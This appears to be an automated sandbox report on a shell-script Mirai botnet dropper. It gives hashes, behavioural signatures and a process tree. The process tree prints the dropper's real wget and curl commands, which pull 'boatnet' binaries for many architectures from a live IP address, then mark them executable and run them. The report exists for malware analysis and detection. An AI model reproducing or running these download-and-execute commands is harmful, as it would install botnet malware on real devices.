Analysis
-
max time kernel
148s -
max time network
153s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
18-12-2024 02:18
Static task
static1
Behavioral task
behavioral1
Sample
2c95ce1c6140c8c2db66382fbc0b832367891d03789b31bfef60f1e34b9250a5.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
2c95ce1c6140c8c2db66382fbc0b832367891d03789b31bfef60f1e34b9250a5.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
2c95ce1c6140c8c2db66382fbc0b832367891d03789b31bfef60f1e34b9250a5.sh
Resource
debian9-mipsbe-20240611-en
General
-
Target
2c95ce1c6140c8c2db66382fbc0b832367891d03789b31bfef60f1e34b9250a5.sh
-
Size
2KB
-
MD5
d7aac5b39f096043750096172ee9a84f
-
SHA1
fde809f81c26db59c148255c0b60176c8971bc0c
-
SHA256
2c95ce1c6140c8c2db66382fbc0b832367891d03789b31bfef60f1e34b9250a5
-
SHA512
77c79dcb7c89e16cfe5d3712adf37173249b6066673ff20c2a2b6c90ebe2eb5ac5c295a250b6b9fc0596ff0872ecc15d4dec8852a515c0826436426dd5f1efff
Malware Config
Extracted
mirai
LZRD
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 15 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1498 chmod 1602 chmod 1610 chmod 1490 chmod 1506 chmod 1542 chmod 1514 chmod 1550 chmod 1584 chmod 1626 chmod 1481 chmod 1528 chmod 1564 chmod 1594 chmod 1618 chmod -
Executes dropped EXE 15 IoCs
ioc pid Process /tmp/WTF 1482 WTF /tmp/WTF 1491 WTF /tmp/WTF 1499 WTF /tmp/WTF 1507 WTF /tmp/WTF 1515 WTF /tmp/WTF 1529 WTF /tmp/WTF 1543 WTF /tmp/WTF 1551 WTF /tmp/WTF 1565 WTF /tmp/WTF 1585 WTF /tmp/WTF 1595 WTF /tmp/WTF 1603 WTF /tmp/WTF 1611 WTF /tmp/WTF 1619 WTF /tmp/WTF 1627 WTF -
Modifies Watchdog functionality 1 TTPs 30 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF -
Enumerates running processes
Discovers information about currently running processes on the system
-
Writes file to system bin folder 30 IoCs
description ioc Process File opened for modification /sbin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF -
resource yara_rule behavioral1/files/fstream-1.dat upx -
description ioc Process File opened for reading /proc/967/cmdline WTF File opened for reading /proc/1046/cmdline WTF File opened for reading /proc/1568/cmdline WTF File opened for reading /proc/592/cmdline WTF File opened for reading /proc/1596/cmdline WTF File opened for reading /proc/1162/cmdline WTF File opened for reading /proc/1470/cmdline WTF File opened for reading /proc/411/cmdline WTF File opened for reading /proc/1544/cmdline WTF File opened for reading /proc/1154/cmdline WTF File opened for reading /proc/1150/cmdline WTF File opened for reading /proc/1104/cmdline WTF File opened for reading /proc/1598/cmdline WTF File opened for reading /proc/1278/cmdline WTF File opened for reading /proc/1285/cmdline WTF File opened for reading /proc/1604/cmdline WTF File opened for reading /proc/532/cmdline WTF File opened for reading /proc/1606/cmdline WTF File opened for reading /proc/1518/cmdline WTF File opened for reading /proc/640/cmdline WTF File opened for reading /proc/665/cmdline WTF File opened for reading /proc/1588/cmdline WTF File opened for reading /proc/1150/cmdline WTF File opened for reading /proc/1172/cmdline WTF File opened for reading /proc/1135/cmdline WTF File opened for reading /proc/640/cmdline WTF File opened for reading /proc/476/cmdline WTF File opened for reading /proc/1134/cmdline WTF File opened for reading /proc/518/cmdline WTF File opened for reading /proc/1566/cmdline WTF File opened for reading /proc/1355/cmdline WTF File opened for reading /proc/1120/cmdline WTF File opened for reading /proc/1059/cmdline WTF File opened for reading /proc/1461/cmdline WTF File opened for reading /proc/1301/cmdline WTF File opened for reading /proc/910/cmdline WTF File opened for reading /proc/1116/cmdline WTF File opened for reading /proc/1170/cmdline WTF File opened for reading /proc/660/cmdline WTF File opened for reading /proc/474/cmdline WTF File opened for reading /proc/1596/cmdline WTF File opened for reading /proc/1046/cmdline WTF File opened for reading /proc/476/cmdline WTF File opened for reading /proc/1485/cmdline WTF File opened for reading /proc/1148/cmdline WTF File opened for reading /proc/1622/cmdline WTF File opened for reading /proc/1052/cmdline WTF File opened for reading /proc/1172/cmdline WTF File opened for reading /proc/1011/cmdline WTF File opened for reading /proc/476/cmdline WTF File opened for reading /proc/967/cmdline WTF File opened for reading /proc/1586/cmdline WTF File opened for reading /proc/1311/cmdline WTF File opened for reading /proc/1129/cmdline WTF File opened for reading /proc/1147/cmdline WTF File opened for reading /proc/1042/cmdline WTF File opened for reading /proc/649/cmdline WTF File opened for reading /proc/652/cmdline WTF File opened for reading /proc/944/cmdline WTF File opened for reading /proc/474/cmdline WTF File opened for reading /proc/1116/cmdline WTF File opened for reading /proc/481/cmdline WTF File opened for reading /proc/1544/cmdline WTF File opened for reading /proc/411/cmdline WTF -
System Network Configuration Discovery 1 TTPs 2 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1486 wget 1487 curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/boatnet.x86_64 curl File opened for modification /tmp/boatnet.mpsl curl File opened for modification /tmp/boatnet.arc curl File opened for modification /tmp/boatnet.arm6 curl File opened for modification /tmp/boatnet.sh4 wget File opened for modification /tmp/boatnet.mips wget File opened for modification /tmp/WTF 2c95ce1c6140c8c2db66382fbc0b832367891d03789b31bfef60f1e34b9250a5.sh File opened for modification /tmp/boatnet.arm6 wget File opened for modification /tmp/boatnet.arm7 wget File opened for modification /tmp/boatnet.ppc wget File opened for modification /tmp/boatnet.x86 wget File opened for modification /tmp/boatnet.arm5 wget File opened for modification /tmp/boatnet.i468 curl File opened for modification /tmp/boatnet.arm7 curl File opened for modification /tmp/boatnet.spc wget File opened for modification /tmp/boatnet.spc curl File opened for modification /tmp/boatnet.m68k curl File opened for modification /tmp/boatnet.arm5 curl File opened for modification /tmp/boatnet.arm curl File opened for modification /tmp/boatnet.mpsl wget File opened for modification /tmp/boatnet.arc wget File opened for modification /tmp/boatnet.arm wget File opened for modification /tmp/boatnet.m68k wget File opened for modification /tmp/boatnet.sh4 curl File opened for modification /tmp/boatnet.x86 curl File opened for modification /tmp/boatnet.i686 curl File opened for modification /tmp/boatnet.ppc curl File opened for modification /tmp/boatnet.mips curl
Processes
-
/tmp/2c95ce1c6140c8c2db66382fbc0b832367891d03789b31bfef60f1e34b9250a5.sh/tmp/2c95ce1c6140c8c2db66382fbc0b832367891d03789b31bfef60f1e34b9250a5.sh1⤵
- Writes file to tmp directory
PID:1463 -
/usr/bin/wgetwget http://147.45.124.54/hiddenbin/boatnet.x862⤵
- Writes file to tmp directory
PID:1468
-
-
/usr/bin/curlcurl -O http://147.45.124.54/hiddenbin/boatnet.x862⤵
- Writes file to tmp directory
PID:1479
-
-
/bin/catcat boatnet.x862⤵PID:1480
-
-
/bin/chmodchmod +x 2c95ce1c6140c8c2db66382fbc0b832367891d03789b31bfef60f1e34b9250a5.sh boatnet.x86 config-err-KaZKo5 netplan_shzgbutu snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-J65FIL WTF2⤵
- File and Directory Permissions Modification
PID:1481
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1482
-
-
/usr/bin/wgetwget http://147.45.124.54/hiddenbin/boatnet.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1486
-
-
/usr/bin/curlcurl -O http://147.45.124.54/hiddenbin/boatnet.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1487
-
-
/bin/chmodchmod +x 2c95ce1c6140c8c2db66382fbc0b832367891d03789b31bfef60f1e34b9250a5.sh boatnet.mips boatnet.x86 config-err-KaZKo5 netplan_shzgbutu snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-J65FIL WTF2⤵
- File and Directory Permissions Modification
PID:1490
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1491
-
-
/usr/bin/wgetwget http://147.45.124.54/hiddenbin/boatnet.arc2⤵
- Writes file to tmp directory
PID:1495
-
-
/usr/bin/curlcurl -O http://147.45.124.54/hiddenbin/boatnet.arc2⤵
- Writes file to tmp directory
PID:1496
-
-
/bin/chmodchmod +x 2c95ce1c6140c8c2db66382fbc0b832367891d03789b31bfef60f1e34b9250a5.sh boatnet.arc boatnet.mips boatnet.x86 config-err-KaZKo5 netplan_shzgbutu snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-J65FIL WTF2⤵
- File and Directory Permissions Modification
PID:1498
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1499
-
-
/usr/bin/wgetwget http://147.45.124.54/hiddenbin/boatnet.i4682⤵PID:1503
-
-
/usr/bin/curlcurl -O http://147.45.124.54/hiddenbin/boatnet.i4682⤵
- Writes file to tmp directory
PID:1504
-
-
/bin/chmodchmod +x 2c95ce1c6140c8c2db66382fbc0b832367891d03789b31bfef60f1e34b9250a5.sh boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 config-err-KaZKo5 netplan_shzgbutu snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-J65FIL WTF2⤵
- File and Directory Permissions Modification
PID:1506
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1507
-
-
/usr/bin/wgetwget http://147.45.124.54/hiddenbin/boatnet.i6862⤵PID:1511
-
-
/usr/bin/curlcurl -O http://147.45.124.54/hiddenbin/boatnet.i6862⤵
- Writes file to tmp directory
PID:1512
-
-
/bin/chmodchmod +x 2c95ce1c6140c8c2db66382fbc0b832367891d03789b31bfef60f1e34b9250a5.sh boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 config-err-KaZKo5 netplan_shzgbutu snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-J65FIL WTF2⤵
- File and Directory Permissions Modification
PID:1514
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1515
-
-
/usr/bin/wgetwget http://147.45.124.54/hiddenbin/boatnet.x86_642⤵PID:1519
-
-
/usr/bin/curlcurl -O http://147.45.124.54/hiddenbin/boatnet.x86_642⤵
- Writes file to tmp directory
PID:1520
-
-
/bin/chmodchmod +x 2c95ce1c6140c8c2db66382fbc0b832367891d03789b31bfef60f1e34b9250a5.sh boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 config-err-KaZKo5 netplan_shzgbutu snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-RM1mns systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-J65FIL WTF2⤵
- File and Directory Permissions Modification
PID:1528
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1529
-
-
/usr/bin/wgetwget http://147.45.124.54/hiddenbin/boatnet.mpsl2⤵
- Writes file to tmp directory
PID:1533
-
-
/usr/bin/curlcurl -O http://147.45.124.54/hiddenbin/boatnet.mpsl2⤵
- Writes file to tmp directory
PID:1534
-
-
/bin/chmodchmod +x 2c95ce1c6140c8c2db66382fbc0b832367891d03789b31bfef60f1e34b9250a5.sh boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-KaZKo5 netplan_shzgbutu snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-jA5pUr systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-J65FIL WTF2⤵
- File and Directory Permissions Modification
PID:1542
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1543
-
-
/usr/bin/wgetwget http://147.45.124.54/hiddenbin/boatnet.arm2⤵
- Writes file to tmp directory
PID:1547
-
-
/usr/bin/curlcurl -O http://147.45.124.54/hiddenbin/boatnet.arm2⤵
- Writes file to tmp directory
PID:1548
-
-
/bin/chmodchmod +x 2c95ce1c6140c8c2db66382fbc0b832367891d03789b31bfef60f1e34b9250a5.sh boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-KaZKo5 netplan_shzgbutu snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-jA5pUr systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-J65FIL WTF2⤵
- File and Directory Permissions Modification
PID:1550
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1551
-
-
/usr/bin/wgetwget http://147.45.124.54/hiddenbin/boatnet.arm52⤵
- Writes file to tmp directory
PID:1555
-
-
/usr/bin/curlcurl -O http://147.45.124.54/hiddenbin/boatnet.arm52⤵
- Writes file to tmp directory
PID:1558
-
-
/bin/chmodchmod +x 2c95ce1c6140c8c2db66382fbc0b832367891d03789b31bfef60f1e34b9250a5.sh boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-KaZKo5 netplan_shzgbutu snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-l8y1By systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-J65FIL WTF2⤵
- File and Directory Permissions Modification
PID:1564
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1565
-
-
/usr/bin/wgetwget http://147.45.124.54/hiddenbin/boatnet.arm62⤵
- Writes file to tmp directory
PID:1569
-
-
/usr/bin/curlcurl -O http://147.45.124.54/hiddenbin/boatnet.arm62⤵
- Writes file to tmp directory
PID:1576
-
-
/bin/chmodchmod +x 2c95ce1c6140c8c2db66382fbc0b832367891d03789b31bfef60f1e34b9250a5.sh boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-KaZKo5 netplan_shzgbutu snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-LSX8N2 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-J65FIL WTF2⤵
- File and Directory Permissions Modification
PID:1584
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1585
-
-
/usr/bin/wgetwget http://147.45.124.54/hiddenbin/boatnet.arm72⤵
- Writes file to tmp directory
PID:1589
-
-
/usr/bin/curlcurl -O http://147.45.124.54/hiddenbin/boatnet.arm72⤵
- Writes file to tmp directory
PID:1592
-
-
/bin/chmodchmod +x 2c95ce1c6140c8c2db66382fbc0b832367891d03789b31bfef60f1e34b9250a5.sh boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-KaZKo5 netplan_shzgbutu snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-J65FIL WTF2⤵
- File and Directory Permissions Modification
PID:1594
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1595
-
-
/usr/bin/wgetwget http://147.45.124.54/hiddenbin/boatnet.ppc2⤵
- Writes file to tmp directory
PID:1599
-
-
/usr/bin/curlcurl -O http://147.45.124.54/hiddenbin/boatnet.ppc2⤵
- Writes file to tmp directory
PID:1600
-
-
/bin/chmodchmod +x 2c95ce1c6140c8c2db66382fbc0b832367891d03789b31bfef60f1e34b9250a5.sh boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 config-err-KaZKo5 netplan_shzgbutu snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-J65FIL WTF2⤵
- File and Directory Permissions Modification
PID:1602
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1603
-
-
/usr/bin/wgetwget http://147.45.124.54/hiddenbin/boatnet.spc2⤵
- Writes file to tmp directory
PID:1607
-
-
/usr/bin/curlcurl -O http://147.45.124.54/hiddenbin/boatnet.spc2⤵
- Writes file to tmp directory
PID:1608
-
-
/bin/chmodchmod +x 2c95ce1c6140c8c2db66382fbc0b832367891d03789b31bfef60f1e34b9250a5.sh boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 config-err-KaZKo5 netplan_shzgbutu snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-J65FIL WTF2⤵
- File and Directory Permissions Modification
PID:1610
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1611
-
-
/usr/bin/wgetwget http://147.45.124.54/hiddenbin/boatnet.m68k2⤵
- Writes file to tmp directory
PID:1615
-
-
/usr/bin/curlcurl -O http://147.45.124.54/hiddenbin/boatnet.m68k2⤵
- Writes file to tmp directory
PID:1616
-
-
/bin/chmodchmod +x 2c95ce1c6140c8c2db66382fbc0b832367891d03789b31bfef60f1e34b9250a5.sh boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 config-err-KaZKo5 netplan_shzgbutu snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-J65FIL WTF2⤵
- File and Directory Permissions Modification
PID:1618
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1619
-
-
/usr/bin/wgetwget http://147.45.124.54/hiddenbin/boatnet.sh42⤵
- Writes file to tmp directory
PID:1623
-
-
/usr/bin/curlcurl -O http://147.45.124.54/hiddenbin/boatnet.sh42⤵
- Writes file to tmp directory
PID:1624
-
-
/bin/chmodchmod +x 2c95ce1c6140c8c2db66382fbc0b832367891d03789b31bfef60f1e34b9250a5.sh boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.sh4 boatnet.spc boatnet.x86 boatnet.x86_64 config-err-KaZKo5 netplan_shzgbutu snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-J65FIL WTF2⤵
- File and Directory Permissions Modification
PID:1626
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1627
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
20KB
MD59acf9fc63b01f4a7a5b33881073ff6a6
SHA1cf5be79ccc477ca582c8aee42898442f8089b886
SHA2560a21cbd563070ce0b39665b70de81e88f4680648335e9c6cd13963e8846e7ea9
SHA5121dd2bd462850bdd10a2d95214d16dd358131838862a119b47ba6d70a0c894284efbf7294e24c79b0032aba41e09b8e84c372bdae073d6339e269187b8794eae5